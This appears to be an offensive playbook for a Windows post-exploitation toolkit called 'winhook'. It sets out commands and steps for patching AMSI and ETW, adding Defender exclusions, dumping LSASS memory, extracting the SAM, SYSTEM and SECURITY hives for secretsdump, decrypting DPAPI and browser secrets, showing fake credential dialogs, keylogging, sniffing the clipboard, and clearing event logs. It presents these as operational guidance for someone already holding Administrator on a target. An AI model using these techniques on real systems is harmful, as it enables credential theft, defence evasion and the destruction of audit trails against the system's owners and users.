windows-postexploit
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations
| Field | Value |
|---|---|
| name | windows-postexploit |
| description | Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations |
| category | post-exploitation |
| tags | ["windows","post-exploitation","credential-access","defense-evasion","lsass","dpapi","etw","amsi","sam","keylogging"] |
| tech_stack | ["windows","powershell","python","ctypes","win32api"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-312"] |
| chains_with | ["T1003","T1003.001","T1003.002","T1056.001","T1059.001","T1562.001","T1562.006","T1070.001","T1555","T1555.003"] |
| prerequisites | ["T1068","T1548.002"] |
| version | 1.0 |
Windows post-exploitation here uses userland APIs only (no kernel driver, so no driver signing to deal with) for credential harvesting, monitoring, and stealth. Once you hold Administrator on a Windows target, the winhook tools below cover credential extraction and the operational-security steps around it.
Before deploying winhook tools, verify that your token carries SeDebugPrivilege, whether Defender real-time protection is on, that the LSASS process is running, and whether LSASS is a protected process (RunAsPPL). Run amsi_bypass and etw_blind first if Defender/EDR is active.

```powershell
# Quick prerequisite check (run from an elevated PowerShell)
whoami /priv                                                        # SeDebugPrivilege must be listed; tools enable it via AdjustTokenPrivileges
Get-MpComputerStatus | Select RealTimeProtectionEnabled             # Defender status
Get-Process lsass                                                   # confirm LSASS is running and note its PID
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL  # PPL status: a non-zero value means LSASS is protected and userland dumps fail
```

A missing RunAsPPL value does not prove LSASS is unprotected on current Windows 11 builds, where LSA protection can be on by default; if lsass_dump returns access denied despite SeDebugPrivilege, assume PPL.
Neutralize monitoring before performing credential operations. Keep the scope of these patches in mind: amsi_bypass and etw_blind modify only the process they run in, so every new PowerShell host or helper process has to be patched again; patching the user-mode EtwEventWrite does nothing against kernel-side telemetry (process, thread and handle callbacks, the Threat-Intelligence ETW provider) that EDRs rely on; and adding a Defender exclusion is itself logged (Microsoft-Windows-Windows Defender/Operational, Event ID 5007), so it is a noisy choice on a monitored host.
| Action | Command | Purpose |
|---|---|---|
| Bypass AMSI | winhook amsi_bypass | Patch AmsiScanBuffer to allow undetected PowerShell execution |
| Blind ETW | winhook etw_blind | Patch EtwEventWrite to prevent EDR from receiving telemetry |
| Exclude paths | winhook defender_exclude --path C:\Tools | Add Defender exclusion for tool staging directory |
Extract credentials from multiple sources.
| Action | Command | Purpose |
|---|---|---|
| LSASS dump | winhook lsass_dump | Dump LSASS memory for NTLM hashes, Kerberos tickets, plaintext passwords |
| SAM extraction | winhook sam_dump | Extract registry hives for offline cracking with secretsdump/hashcat |
| DPAPI secrets | winhook dpapi_extract | Decrypt browser passwords, WiFi keys, Windows Vault credentials |
| Credential phishing | winhook credential_prompt | Spawn fake Windows credential dialog to capture user password |
| Keystroke capture | winhook keylog_win --duration 120 | Log keystrokes with active window context |
| Clipboard monitoring | winhook clipboard_sniff --duration 60 | Capture copied passwords, tokens, and sensitive data |
LSASS dumping uses either the MiniDump export of comsvcs.dll (the default, invoked through rundll32) or a direct call to MiniDumpWriteDump in dbghelp.dll. Both DLLs are Microsoft-signed; the comsvcs route is preferred because no custom dump code has to be loaded into your own process, but its rundll32 command line is a well-known indicator, and either method opens an LSASS handle that Sysmon Event ID 10 (ProcessAccess) records. Both fail once RunAsPPL is set, since a non-PPL process cannot obtain a handle with PROCESS_VM_READ to a protected LSASS.
DPAPI decryption calls CryptUnprotectData from crypt32.dll, so no master-key file handling is needed: the call runs in the current user's context and Windows resolves the right master key itself. This covers Windows Credential Manager/Vault entries and the Chrome/Edge Local State key that protects Login Data (the stored password values are AES-256-GCM ciphertext under that key, not DPAPI blobs themselves). Two caveats: WiFi profile keys are protected in the machine (LocalSystem) context, so they decrypt only from SYSTEM or through netsh wlan show profile name=<ssid> key=clear as Administrator; and recent Chrome builds with App-Bound Encryption wrap the browser key again through a SYSTEM-level service, so a user-context CryptUnprotectData alone no longer recovers it.
SAM extraction uses reg save to write the SAM, SYSTEM and SECURITY hives to disk; SYSTEM is required because it holds the bootkey that decrypts the other two. Process them offline with impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL, which yields local account NT hashes from SAM and LSA secrets plus cached domain credentials (DCC2) from SECURITY.
Understand the target environment and detect defensive measures.
| Action | Command | Purpose |
|---|---|---|
| Process monitoring | winhook etw_process --duration 60 | Track process creation via ETW — detect security tools, scheduled tasks |
| Network monitoring | winhook etw_network --duration 60 | Track connections via ETW — identify C2 channels, internal services |
Always run cleanup before exiting a target.
```
winhook cleanup_win
```
The cleanup tool:
Windows post-exploitation tools are detectable by:
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| lsass_dump | LSASS memory dump via MiniDumpWriteDump | T1003.001 — LSASS Memory |
| sam_dump | Registry hive extraction (SAM/SYSTEM/SECURITY) | T1003.002 — Security Account Manager |
| dpapi_extract | DPAPI secret decryption via CryptUnprotectData | T1555.003 — Credentials from Web Browsers |
| credential_prompt | Fake credential dialog via CredUI | T1056.002 — GUI Input Capture |
| keylog_win | Keystroke capture via SetWindowsHookEx | T1056.001 — Keylogging |
| etw_process | Process monitoring via ETW provider | T1057 — Process Discovery |
| etw_network | Network monitoring via ETW provider | T1049 — System Network Connections Discovery |
| clipboard_sniff | Clipboard monitoring via Win32 API | T1115 — Clipboard Data |
| amsi_bypass | AMSI patching in memory | T1562.001 — Disable or Modify Tools |
| etw_blind | ETW patching to blind EDR | T1562.006 — Indicator Blocking |
| defender_exclude | Windows Defender exclusion management | T1562.001 — Disable or Modify Tools |
| cleanup_win | Event log clearing and artifact removal | T1070.001 — Clear Windows Event Logs |